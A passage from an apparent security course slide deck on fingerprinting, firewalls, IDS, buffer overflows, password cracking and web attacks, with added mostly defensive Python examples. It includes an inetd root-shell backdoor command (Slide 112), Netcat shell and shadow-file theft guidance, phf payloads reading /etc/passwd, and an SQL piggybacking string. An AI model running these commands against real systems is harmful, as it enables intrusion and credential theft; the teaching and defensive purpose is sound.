Slide 81: SYN Flood Resistance • If too many forged SYN packets are sent to some operating systems, they will stop accepting new connections. • Many operating systems can only handle 8 packets. • By sending 8 forged packets to an open port and then trying to establish a connection, you can learn about the operating system used. • This is easier to detect on the target side than other methods, however.
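An added example (not part of the deck) for the ISN-sampling test of Slide 77: pull the initial sequence number out of a run of SYN|ACK segments and sort the run into the classes the slide names. The SYN|ACKs are constructed rather than captured, and the 2**20 boundary used to separate "random increments" from "true random" is this example's own threshold, not nmap's exact heuristic.

```python
import struct
from functools import reduce
from math import gcd

SEQ_SPACE = 1 << 32


def isn_of(segment):
    """Sequence number field (bytes 4..7) of a raw TCP segment, e.g. a received SYN|ACK."""
    return struct.unpack("!I", segment[4:8])[0]


def isn_deltas(samples):
    """Differences between consecutive ISNs, taken modulo the 32-bit sequence space."""
    return [(b - a) % SEQ_SPACE for a, b in zip(samples, samples[1:])]


def classify_isn(samples):
    """Class of a run of ISNs from back-to-back SYNs, plus the GCD of the deltas (a large GCD
    means the stack steps in fixed units, itself a fingerprinting cue)."""
    if len(samples) < 4:
        raise ValueError("need at least four samples")
    deltas = isn_deltas(samples)
    g = reduce(gcd, deltas)
    if g == 0:                                   # every delta is zero
        return "constant", 0
    if len(set(deltas)) == 1:
        return ("traditional 64K increments" if deltas[0] == 64000 else "fixed increment"), g
    if max(deltas) < 1 << 20:
        return "random increments", g            # small, typically time-dependent steps
    return "true random", g


def constructed_syn_acks(isns, sport=80, dport=40000):
    """Minimal 20-byte SYN|ACK headers carrying the given ISNs (constructed, not captured)."""
    return [struct.pack("!HHIIHHHH", sport, dport, isn, 1, (5 << 12) | 0x12, 8192, 0, 0) for isn in isns]


def fingerprint_from_segments(segments):
    """The whole step: extract the ISNs from received SYN|ACKs and classify the run."""
    return classify_isn([isn_of(s) for s in segments])
```

On a real target the segments come from several connection attempts sent as close together as possible, so that time-based generators show small deltas; spacing the probes out inflates the deltas and pushes a "random increments" stack toward the "true random" bucket.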

Slide 82: Tool summary (Name | Purpose | Platform | Where to get it | Comments)
• Whois database | Gives the registrar's name when given a company's name or domain name | Web-based database | For .com, .net, .org: www.internic.net/whois.html; for other domains: www.allwhois.com/home.html |
• IP Address Lookup | Gives all IP address blocks assigned to an organization or domain name | Web-based database | North and South America, Caribbean, sub-Saharan Africa: www.arin.net/whois/arinwhois.html; Europe: www.ripe.net; Asia: www.apnic.net |
• DNS Lookup (nslookup) | Gives DNS information about a corresponding IP address | Built into Windows and Linux | More information: www.zoneedit.com/doc/nslookup.html |
• Sam Spade | Ping, whois, IP block lookup, DNS lookup, dig, zone transfer, traceroute, finger, SMTP verify, web browser | Windows | www.samspade.org/ssw/ | Note that all of the operations can be traced back to the system running the program
• Web-Based Tools | Traceroute, lookup, ping, DNS lookup, DNS records, e-mail validation | Web-based | www.network-tools.com/; privacy.net/analyze | Web based, so the target sees the portal's address rather than yours (the portal itself can still log you)
• THC-Scan 2.0 | War dialer | Windows | www.thc.org/releases.php | Lots of other useful tools on this site
• Cheops | Ping sweep, traceroute, and draws a visual representation of the network | Linux | www.marko.net/cheops | First need to download glib10-1.0.6-6.i386.rpm and gtk+10-1.0.6-6.i386.rpm (available at rpmfind.net/linux/RPM/redhat/6.2/i386)
• Traceroute | Determine network topology | Windows, Linux | Built into Windows and Linux | Windows command: tracert [IP addr.]; Linux command: traceroute [IP addr.]
• Nmap | Port scanner and network mapper | Windows, Linux | www.insecure.org/nmap/idlescan.html |
• Firewalk | Able to determine if ports are available through a firewall or router | Linux | www.packetfactory.net/projects/firewalk/firewalk-5.0.tgz | Only for packet-filtering firewalls. Need to download the 3 libraries: libnet and libpcap from the site, and libdnet (for Fedora 2 from rpmfind.net/linux/rpm2html/search.php?query=libdnet)
• Nessus | Vulnerability scanner | Windows, Linux | www.nessus.com | Can test multiple hosts at the same time; allows the user to write plug-ins
• Stack Based Buffer Overflow Attack | Using a stack overflow to get a target machine to execute code | Windows, Linux | packetstormsecurity.org/docs/hack/Smashstack.txt | Text document explaining the process
• Pwdump | Extracts hashed | Windows | packetstormsecurity.org/Crackers/N |

Slide 83: Random Clipart

Slide 84: Pre-Phase 3 Understanding Filters, Firewalls and the IDS

Slide 85: Packet Filter • First line of defense. • Checks each packet against a policy or rule before routing it to the destination node or network. • Most are configured to reject packets that would start a conversation from the outside: inbound TCP SYN packets (as opposed to SYN/ACK replies to connections opened from inside), ICMP, and unsolicited incoming UDP.

Slide 86: Example • Cisco Series Access Router • If router is configured to pass a particular protocol, external hosts can use that protocol to establish a direct connection to internal hosts. • The router will produce an audit log with features to generate alarms when hostile behavior is detected.

Slide 87: Enhanced Version Stateful Filter

Slide 88: Stateful Filter • Provides same functionality as previous version, but also keeps track of state information, such as TCP sequence numbers. • Uses the analysis of data within the lowest levels of the protocol stack to compare the current session to previous ones for the purpose of detecting suspicious activity. • Uses specific rules determined by the user.

Slide 89: Downside • Does not recognize specific applications, therefore, is unable to apply dissimilar rules to different applications.

Slide 90: Proxy Firewall

Slide 91: • A simple server with dual NICs that has routing or packet forwarding deactivated, running a proxy server daemon instead. • Gateway is a term used as a synonym for proxy server. • Gathers all Internet requests, forwards them to Internet servers, receives the responses and forwards them to the original requestor within the company.

Slide 92: Enhanced Version Application Proxy Gateway

Slide 93: Application Proxy Gateway • Contains integrated modules that check every request and response. • Example: – An FTP stream may only be allowed to download data.

Slide 94: Application Gateways look at data on the application layer of the protocol stack and serve as proxies for outside users. Thus, outside users never really have a direct connection to anything beyond the proxy gateway.

Slide 95: Implementing a Backdoor Method: 4 Actions Take Place • Seizing a virtual connection; this involves hijacking a remote telnet session, a VPN tunnel or a SecurID session. • Planting an insider; a user, engineer or socially engineered (swindled) person. – Can also spoof an employee with an e-mail carrying a remote-access Trojan as an attachment.

Slide 96: • Manipulating an internal vulnerability; attacks on demilitarized zones, such as E-mail, domain name resolution, telnet or FTP. • Manipulating an external vulnerability; involves penetrating through external mail server, HTTP server daemon and/or telnet service on an external boundary gateway.

Slide 97: Intrusion Detection System

Slide 98: Anomaly-Based Intrusion Detection Systems • Detect statistical anomalies. Measure a "baseline" of such stats as CPU utilization, disk activity, user logins, file activity, and so forth. Then the system can trigger when there is a deviation from this baseline. • Can detect the anomalies without having to understand the underlying cause behind them.

Slide 99: Signature Recognition • The majority of commercial products are based upon examining the traffic for well-known patterns of attack. • The classic example is to examine every packet on the wire for the pattern "/cgi-bin/phf?", which might indicate somebody attempting to access this vulnerable CGI script on a web server.

Slide 100: How does a NIDS match signatures with incoming traffic? • 1. Protocol stack verification A number of intrusions, such as "Ping-O-Death" and "TCP Stealth Scanning", use violations of the underlying IP, TCP, UDP, and ICMP protocols in order to attack the machine. A simple verification system can flag invalid packets. This can include valid but suspicious behavior such as severely fragmented IP packets.

Slide 101: • 2. Application protocol verification A number of intrusions use invalid protocol behavior, such as "WinNuke", which uses invalid NetBIOS protocol, or DNS cache poisoning, which has a valid but unusual signature. In order to detect these intrusions effectively, a NIDS must re-implement a wide variety of application-layer protocols in order to detect suspicious or invalid behavior.

Slide 102: 3. Creating new loggable events A NIDS can be used to extend the auditing capabilities of your network management software. For example, a NIDS can simply log all the application layer protocols used on a machine. Downstream event log systems (WinNT Event, UNIX syslog, SNMP TRAPS, etc.) can then correlate these extended events with other events on the network.
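As an added example (not part of the deck) of why Slide 101's application-protocol verification matters for Slide 99's signature matching: the same signatures run over raw bytes and again over a decoded HTTP request line. The percent-encoded variant of the phf request slips past the raw match and is caught only after decoding; a non-HTTP payload is rejected by the protocol check before any signature is tried. The packet payloads are constructed, not captured.

```python
import re
from urllib.parse import unquote

# Signatures are regular expressions applied to the request target.
SIGNATURES = {
    "phf-cgi": re.compile(r"/cgi-bin/phf\?"),          # Slide 99's classic pattern
    "dir-traversal": re.compile(r"(^|/)\.\.(/|$)"),
}


def decode_http_request(payload):
    """Application-layer decode of a request line: (method, percent-decoded target, version), or
    None when the bytes are not a well-formed HTTP request (the protocol-verification step)."""
    line, sep, _ = payload.partition(b"\r\n")
    if not sep:
        return None
    parts = line.split(b" ")
    if len(parts) != 3 or not parts[0].isalpha() or not parts[2].startswith(b"HTTP/"):
        return None
    method, target, version = (p.decode("latin-1") for p in parts)
    return method, unquote(target), version


def match_raw(payload):
    """What a byte-pattern NIDS does: run the signatures over the raw bytes."""
    text = payload.decode("latin-1")
    return {name for name, rx in SIGNATURES.items() if rx.search(text)}


def match_decoded(payload):
    """The same signatures after protocol decoding; catches percent-encoded variants."""
    req = decode_http_request(payload)
    if req is None:
        return set()
    return {name for name, rx in SIGNATURES.items() if rx.search(req[1])}


def inspect(payloads):
    """Per-payload (raw alerts, decoded alerts) for a batch of TCP payloads."""
    return [(match_raw(p), match_decoded(p)) for p in payloads]


# Constructed sample payloads (not real captures)
SAMPLES = [
    b"GET /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.0\r\n\r\n",   # plain phf attack
    b"GET /cgi-bin/%70hf?Qalias=x%0a/bin/ls HTTP/1.0\r\n\r\n",              # 'p' encoded to dodge raw match
    b"GET /images/../../etc/passwd HTTP/1.1\r\nHost: www.example.com\r\n\r\n",
    b"\x16\x03\x01\x00\xa5\x01\x00\x00\xa1\x03\x03",                          # not HTTP (start of a TLS ClientHello)
]
```

inspect(SAMPLES) flags the first payload both ways, the second only after decoding, the third both ways, and the fourth not at all. Real evasion goes further (chunking, double encoding, TCP segment splitting), which is why the slide's "re-implement the protocol" is the only robust position.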

Slide 103: Other countermeasures besides IDS • Firewalls: These protect from external attacks; most intrusions are committed by employees already inside the firewall, so a firewall should be considered one line of defense rather than the whole of it.

Slide 104: Authentication • Run scanners that automate the finding of open accounts (accounts with blank or default passwords). • Automatically enforce a strict password policy (the deck's 2004-era baseline: 7-character minimum including numbers, mixed case and punctuation; current guidance such as NIST SP 800-63B favours length over composition rules) using crack or built-in policy checkers (native in Windows NT, add-on for UNIX).

Slide 105: Virtual Private Networks • Create secure connections over the Internet for remote access. • VPNs can actually decrease corporate security. While the pipe itself is secure (authenticated, encrypted), either end of the pipe is wide open. • A home machine compromised with a backdoor or rootkit allows a hacker to subvert the VPN connection, giving full, undetectable access to the other side of the firewall.

Slide 106: IDS Setup Locations

Slide 107: • Network Hosts: Although network intrusion detection systems have traditionally been used as probes, they can also be placed on hosts. • Network perimeter: IDS is most effective on the network perimeter, such as on both sides of the firewall, near the dial-up server, and on links to partner networks. These links tend to be low-bandwidth (T1 speeds) such that an IDS can keep up with the traffic.

Slide 108: • Servers are often placed on their own network, connected to switches. The problem these servers have, though, is that IDS systems cannot keep up with high-volume traffic. • Server Farms: For extremely important servers, you may be able to install dedicated IDS systems that monitor just the individual server's link. Also, application servers tend to have lower traffic than file servers, so they are better targets for IDS systems.

Slide 109: Phase 3 Penetration

Slide 110: Stack Based Overflow Attack • Overwrite the return pointer stored on the stack by overflowing a stack buffer. When the overwritten return pointer is copied into the instruction pointer (IP), the CPU tries to fetch its next instruction from the new address that was written over the return pointer. • Example: Overflow the stack with a series of 'A's. When the return pointer is copied into the IP, the CPU will try to fetch the next instruction from the all-'A' address (41414141h).

Slide 111: • It is important to overflow the buffer with meaningful information, i.e. machine-language code containing the commands the attacker wants executed. • It is difficult to overwrite the return pointer so that it hits exactly the beginning of that code: – Place a run of NOPs or NOP equivalents (called a NOP sled) at the beginning of the code. – The overwritten return pointer then only has to land within a range of values rather than on one specific value.

Slide 112: • Once the stack is smashed, there are many things an attacker can do. Most likely, the attacker will try to create a back door to the target system. • Creating a backdoor with Inetd: Add a line to the /etc/inetd.conf file, which will spawn a command shell each time anyone tries to connect to a port defined by the attacker. Run this line in the stack to get a command shell to open on a given port: /bin/sh –c “echo [port #] stream tcp nopwait root /bin/sh sh –I” >> /etc/inetd.conf; killall –HUP inetd

Slide 113: • Creating a backdoor with TFTP and Netcat: Get the target to execute the TFTP client. Load the Netcat program onto the target system. Configure Netcat to push a command shell from the target machine to the attacker's machine. • A good document on Stack Based Buffer Overflow Attacks: "Smashing the Stack for Fun and Profit" by Aleph One, available at: packetstormsecurity.org/docs/hack/smashstack.txt

Slide 114: Password Attacks • Two kinds: Password Guessing and Password Cracking • Password Guessing: Attempt to guess the password for a particular user ID. This process is rarely successful, time consuming, and generates a lot of network traffic. Also, some accounts are locked out after a set number of unsuccessful guesses. Many password-guessing tools can be found at Packet Storm’s Site: packetstormsecurity.org
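Added example (not from the slides) of the defender's side of password guessing: it parses constructed sshd "Failed password" lines, flags sources that generate many failures in a short window (the noisy traffic the slide mentions), and reports which accounts would reach the lockout threshold. The thresholds, hostnames and addresses are constructed.

```python
"""Detect password-guessing bursts and compute lockouts from auth log lines."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sshd lines: one source hammers two accounts, another user just mistypes once.
AUTH_LOG = """\
Aug 21 11:02:01 fileserver sshd[600]: Failed password for alice from 10.0.0.5 port 40001 ssh2
Aug 21 11:02:03 fileserver sshd[601]: Failed password for alice from 10.0.0.5 port 40002 ssh2
Aug 21 11:02:04 fileserver sshd[602]: Failed password for alice from 10.0.0.5 port 40003 ssh2
Aug 21 11:02:06 fileserver sshd[603]: Failed password for alice from 10.0.0.5 port 40004 ssh2
Aug 21 11:02:07 fileserver sshd[604]: Failed password for bob from 10.0.0.5 port 40005 ssh2
Aug 21 11:02:09 fileserver sshd[605]: Accepted password for alice from 10.0.0.5 port 40006 ssh2
Aug 21 11:30:00 fileserver sshd[700]: Failed password for carol from 10.0.0.8 port 40100 ssh2
Aug 21 11:30:40 fileserver sshd[701]: Accepted password for carol from 10.0.0.8 port 40101 ssh2
"""

FAIL_RE = re.compile(
    r"^\w{3} +\d+ (?P<time>\d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"Failed password for (?P<user>\S+) from (?P<src>\S+)")


def parse_failures(log):
    """Return (time, user, source) for every failed login; the date is ignored
    because the constructed sample spans a single day."""
    fails = []
    for line in log.splitlines():
        m = FAIL_RE.match(line)
        if m:
            fails.append((datetime.strptime(m["time"], "%H:%M:%S"), m["user"], m["src"]))
    return fails


def max_in_window(times, window):
    """Largest number of events falling inside any window-sized interval."""
    times = sorted(times)
    best, start = 0, 0
    for end, t in enumerate(times):
        while t - times[start] > window:
            start += 1
        best = max(best, end - start + 1)
    return best


def guessing_report(log, src_threshold=5, lock_threshold=3, window=timedelta(seconds=60)):
    """Sources to alert on and accounts that would be locked out under the
    'N failures within the window' rule the slide refers to."""
    by_src, by_user = defaultdict(list), defaultdict(list)
    for t, user, src in parse_failures(log):
        by_src[src].append(t)
        by_user[user].append(t)
    noisy = {s for s, ts in by_src.items() if max_in_window(ts, window) >= src_threshold}
    locked = {u for u, ts in by_user.items() if max_in_window(ts, window) >= lock_threshold}
    return {"sources_to_alert": sorted(noisy), "accounts_to_lock": sorted(locked)}


if __name__ == "__main__":
    print(guessing_report(AUTH_LOG))
```

Note that the "Accepted password" line for alice comes after four failures in eight seconds: with a lockout threshold of three that login would never have been allowed, which is exactly the effect of the lockout the slide mentions.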

Slide 115: • Password Cracking: Steal the file with the encrypted passwords and use a password cracking program to recover the original passwords. • Stealing the file: – Windows: use a Pwdump program (packetstormsecurity.nl/Crackers/NT/), or sniff them from the network (more on sniffing later). – UNIX: gain root-level access and steal the /etc/shadow or /etc/secure file if shadow passwords are used; otherwise steal the /etc/passwd file.

Slide 116: • Password Cracking Software: • Windows: L0phtCrack (available: www.atstake.com/products/lc/). This tool includes other options, such as a sniffer and a pwdump program. • UNIX: John the Ripper (available: www.openwall.com/john/)

Slide 117: Web Application Attacks • Can still be conducted, even if the target site uses SSL. • Account Harvesting, Undermining Session-Tracking Mechanisms, SQL Piggybacking • Account Harvesting: Works for applications that have different error messages for an incorrect user ID and an incorrect password. By looking at the error messages, the attacker can determine valid user ID's, sometimes even passwords.

Slide 118: • Here, although the web pages look identical for each type of error, notice that the URL has changed, giving any hackers a hint about incorrect user ID’s vs. incorrect passwords.
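An added Python example, not part of the slides, showing the defect behind account harvesting beside its fix: login_leaky returns a different redirect URL and message for an unknown user ID than for a wrong password, while login_uniform returns the same response either way and does the same hashing work for unknown users. The user table, salt and function names are constructed.

```python
"""Account harvesting: a login that distinguishes bad IDs from bad passwords, and one that does not."""
import hashlib
import hmac

SALT = b"constructed-salt"  # constructed; a real store uses a random per-user salt


def pw_hash(salt, password):
    """Salted SHA-256 hex digest (a slow KDF would be used in practice)."""
    return hashlib.sha256(salt + password.encode()).hexdigest()


# Constructed user table: user ID -> password hash.
USERS = {"alice": pw_hash(SALT, "correct horse")}

# Hash compared against when the user ID does not exist, so the code path
# costs the same time as a real lookup.
DUMMY_HASH = pw_hash(SALT, "dummy-for-unknown-users")


def login_leaky(userid, password):
    """'Before': the two failure branches differ, so the URL tells user IDs apart."""
    if userid not in USERS:
        return {"ok": False, "redirect": "/login?err=nouser", "message": "Unknown user ID"}
    if not hmac.compare_digest(pw_hash(SALT, password), USERS[userid]):
        return {"ok": False, "redirect": "/login?err=badpass", "message": "Wrong password"}
    return {"ok": True, "redirect": "/home", "message": ""}


def login_uniform(userid, password):
    """'After': one failure response regardless of which part was wrong."""
    stored = USERS.get(userid, DUMMY_HASH)
    match = hmac.compare_digest(pw_hash(SALT, password), stored)
    if userid in USERS and match:
        return {"ok": True, "redirect": "/home", "message": ""}
    return {"ok": False, "redirect": "/login?err=1",
            "message": "Invalid user ID or password"}


def leaks_user_existence(login):
    """Self-check for a site owner: does a known ID with a wrong password get a
    different failure response than an unknown ID?"""
    known = login("alice", "not-the-password")
    unknown = login("no-such-user", "not-the-password")
    return known != unknown


if __name__ == "__main__":
    print("leaky   :", leaks_user_existence(login_leaky))
    print("uniform :", leaks_user_existence(login_uniform))
```

The check compares the whole response, not just the message text, because, as the slide above notes, a site can show identical pages while still leaking the distinction through the URL.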

Slide 119: Undermining Web Application Session Tracking • Three ways Session ID's are implemented: URL session tracking, hidden form elements, and cookies. • The attacker will first log in to the site multiple times to see how the session ID's are generated. • To change a session ID in a URL, simply type a different user's session ID (or a generated one) over the original user's ID in the URL.

Slide 120: • To change the session ID in a site with hidden form elements, view the source of the page, modify the ID number and reload it into the browser. • To edit the session ID in a site that uses cookies, use a program called Achilles (available: www.mavensecurity.com/achilles). Achilles is a web proxy that intercepts the per-session cookies and allows the attacker to modify them.
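Added example (not from the slides) contrasting the session-ID generation these slides warn about with a safer one, in Python: a counter-based store, where a neighbouring value resolves to another user's session, beside a store that issues unguessable random IDs, keeps the ID-to-user mapping only on the server and rejects any ID it did not issue. Class and method names are constructed.

```python
"""Sequential versus random session IDs, with a check for guessable neighbours."""
import secrets


class SequentialSessions:
    """'Before': session IDs come from a counter (constructed weak design)."""

    def __init__(self):
        self._next_id = 1000
        self._sessions = {}

    def create(self, user):
        sid = str(self._next_id)
        self._next_id += 1
        self._sessions[sid] = user
        return sid

    def lookup(self, sid):
        return self._sessions.get(sid)


class RandomSessions:
    """'After': 256-bit random IDs; only the server knows which ID maps to whom."""

    def __init__(self):
        self._sessions = {}

    def create(self, user):
        sid = secrets.token_urlsafe(32)  # 32 random bytes, URL- and cookie-safe
        self._sessions[sid] = user
        return sid

    def lookup(self, sid):
        # A miss reveals nothing about other sessions: IDs are independent random values.
        return self._sessions.get(sid)

    def destroy(self, sid):
        """Invalidate on logout so a captured ID stops working."""
        self._sessions.pop(sid, None)


def neighbour_resolves(store, sid):
    """Site-owner check: does the next counter value after sid belong to a live session?
    Non-numeric (random) IDs have no meaningful neighbour and return False."""
    try:
        guess = str(int(sid) + 1)
    except ValueError:
        return False
    return store.lookup(guess) is not None


def tampered(sid):
    """Return sid with its first character changed, to test that edits are rejected."""
    first = "A" if sid[0] != "A" else "B"
    return first + sid[1:]


if __name__ == "__main__":
    seq = SequentialSessions()
    a, b = seq.create("alice"), seq.create("bob")
    print("sequential: neighbour of alice's ID resolves ->", neighbour_resolves(seq, a))
    rnd = RandomSessions()
    a, b = rnd.create("alice"), rnd.create("bob")
    print("random: tampered ID resolves ->", rnd.lookup(tampered(b)) is not None)
```

The difference the slide is pointing at is entirely in create(): a counter lets a user type an adjacent value, while secrets.token_urlsafe(32) gives 256 bits from the operating system's CSPRNG, so there is no adjacent value to try.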

Slide 121: SQL Piggybacking • Extending an application’s SQL statement to extract or update information that the attacker is not authorized to access. • Rainforest Puppy has a paper about SQL Piggybacking: “How I Hacked Packetstorm” (available: www.opennet.ru/base/cgi/22.txt.html ) • Begin by exploring how the Web application interacts with the database.

Slide 122: • The attacker may extend the SQL query – Example • Use SELECT * FROM account WHERE (userid='10001' and number = '11111111111' or userid='10002') • instead of SELECT * FROM account
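Added Python/sqlite3 example, not from the slides, built around the slide's own account query: lookup_concat assembles the SQL by string concatenation, so the slide's value for the number field extends the WHERE clause into exactly the statement shown above and returns another user's row; lookup_param passes the same value as a bound parameter, and the database treats it as a literal account number that matches nothing. The table contents are constructed.

```python
"""SQL piggybacking: concatenated query beside the parameterised fix."""
import sqlite3

# The slide's input for the number field: closes the string and appends "or userid='10002'".
PIGGYBACK = "11111111111' or userid='10002"


def make_db():
    """Constructed in-memory account table."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE account (userid TEXT, number TEXT, balance INTEGER)")
    con.executemany("INSERT INTO account VALUES (?, ?, ?)",
                    [("10001", "99999999999", 500),
                     ("10002", "22222222222", 1200)])
    return con


def lookup_concat(con, userid, number):
    """'Before': user input is pasted into the SQL text."""
    sql = (f"SELECT userid, balance FROM account "
           f"WHERE (userid='{userid}' and number = '{number}')")
    return con.execute(sql).fetchall()


def lookup_param(con, userid, number):
    """'After': the statement is fixed; values travel separately as parameters."""
    sql = "SELECT userid, balance FROM account WHERE (userid=? and number = ?)"
    return con.execute(sql, (userid, number)).fetchall()


if __name__ == "__main__":
    con = make_db()
    print("concat :", lookup_concat(con, "10001", PIGGYBACK))
    print("param  :", lookup_param(con, "10001", PIGGYBACK))
    print("param, correct number:", lookup_param(con, "10002", "22222222222"))
```

With the concatenated version the "and" binds tighter than the "or", so the query becomes "(10001 with that number) OR userid='10002'" and the second account's balance comes back without its number ever being supplied; the bound-parameter version returns nothing for the same input.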